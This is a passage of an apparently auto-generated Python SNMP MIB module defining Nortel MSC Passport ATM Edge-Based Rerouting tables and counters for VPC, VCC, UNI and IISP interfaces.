if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 4, 6, 2, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 4, 6, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvIndex.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 4, 6, 2, 20))
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 4, 6, 2, 20, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVpcSrcIndex'),
(0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcSrcEbrOvIndex'))
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 1), Integer32().subtype(subtypeSpec
=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4,
1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 2), Integer32().subtype(
subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(
'readwrite')
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4,
11))
mscAtmIfVpcEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 4, 11, 1))
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 4, 11, 1, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcEbrInfoIndex'))
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 4, 11, 1, 1, 1), RowStatus()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVpcEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 4, 11, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVpcEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 4, 11, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVpcEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 4, 11, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoIndex.setStatus('mandatory')
mscAtmIfVpcEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 4, 11, 30))
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 4, 11, 30, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcEbrInfoIndex'))
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 4, 11, 30, 1, 1), Integer32().subtype(subtypeSpec=
ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 4, 11, 30, 1, 2), Integer32().subtype(subtypeSpec=
ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 4, 11, 30, 1, 3), Integer32().subtype(subtypeSpec=
ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoConnectionRecovered.setStatus('mandatory')
mscAtmIfVpcEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 4, 11, 40))
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 4, 11, 40, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcEbrInfoIndex'))
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,
1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 1), Counter32()).setMaxAccess(
'readonly')
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVpcEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 4, 11, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVpcEbrInfoTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
5, 8, 2))
mscAtmIfVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 5, 8, 2, 1))
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 5, 8, 2, 1, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVccSrcIndex'),
(0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccSrcEbrOvIndex'))
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 5, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 5, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 5, 8, 2, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 5, 8, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvIndex.setStatus('mandatory')
mscAtmIfVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 5, 8, 2, 20))
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 5, 8, 2, 20, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVccSrcIndex'),
(0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccSrcEbrOvIndex'))
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec
=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4,
1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 2), Integer32().subtype(
subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(
'readwrite')
if mibBuilder.loadTexts:
mscAtmIfVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5,
12))
mscAtmIfVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 5, 12, 1))
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 5, 12, 1, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccEbrInfoIndex'))
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 5, 12, 1, 1, 1), RowStatus()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 5, 12, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 5, 12, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 5, 12, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoIndex.setStatus('mandatory')
mscAtmIfVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 5, 12, 30))
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 5, 12, 30, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccEbrInfoIndex'))
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 5, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=
ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 5, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=
ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 5, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=
ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoConnectionRecovered.setStatus('mandatory')
mscAtmIfVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 5, 12, 40))
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 5, 12, 40, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccEbrInfoIndex'))
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,
1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 1), Counter32()).setMaxAccess(
'readonly')
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 5, 12, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
mscAtmIfUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7))
mscAtmIfUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 6, 7, 1))
if mibBuilder.loadTexts:
mscAtmIfUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 6, 7, 1, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfUniEbrRowStatus.setStatus('mandatory')
mscAtmIfUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfUniEbrComponentName.setStatus('mandatory')
mscAtmIfUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 6, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfUniEbrStorageType.setStatus('mandatory')
mscAtmIfUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
mscAtmIfUniEbrIndex.setStatus('mandatory')
mscAtmIfUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6,
7, 20))
if mibBuilder.loadTexts:
mscAtmIfUniEbrProvTable.setStatus('mandatory')
mscAtmIfUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
6, 7, 20, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfUniEbrProvEntry.setStatus('mandatory')
mscAtmIfUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=
ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=
ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfUniEbrPathOptimization.setStatus('mandatory')
mscAtmIfUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6,
7, 30))
if mibBuilder.loadTexts:
mscAtmIfUniEbrOperTable.setStatus('mandatory')
mscAtmIfUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
6, 7, 30, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfUniEbrOperEntry.setStatus('mandatory')
mscAtmIfUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=
ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4,
1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=
ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,
4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 3), Gauge32().subtype(
subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
6, 7, 40))
if mibBuilder.loadTexts:
mscAtmIfUniEbrStatsTable.setStatus('mandatory')
mscAtmIfUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 6, 7, 40, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 6, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfUniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 6, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfUniEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7))
mscAtmIfIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 7, 7, 1))
if mibBuilder.loadTexts:
mscAtmIfIispEbrRowStatusTable.setStatus('mandatory')
mscAtmIfIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 7, 7, 1, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfIispEbrRowStatus.setStatus('mandatory')
mscAtmIfIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfIispEbrComponentName.setStatus('mandatory')
mscAtmIfIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 7, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfIispEbrStorageType.setStatus('mandatory')
mscAtmIfIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
7, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
mscAtmIfIispEbrIndex.setStatus('mandatory')
mscAtmIfIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
7, 7, 20))
if mibBuilder.loadTexts:
mscAtmIfIispEbrProvTable.setStatus('mandatory')
mscAtmIfIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 7, 7, 20, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfIispEbrProvEntry.setStatus('mandatory')
mscAtmIfIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=
ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=
ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfIispEbrPathOptimization.setStatus('mandatory')
mscAtmIfIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
7, 7, 30))
if mibBuilder.loadTexts:
mscAtmIfIispEbrOperTable.setStatus('mandatory')
mscAtmIfIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 7, 7, 30, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfIispEbrOperEntry.setStatus('mandatory')
mscAtmIfIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=
ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4,
1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=
ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,
4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 3), Gauge32().subtype(
subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
7, 7, 40))
if mibBuilder.loadTexts:
mscAtmIfIispEbrStatsTable.setStatus('mandatory')
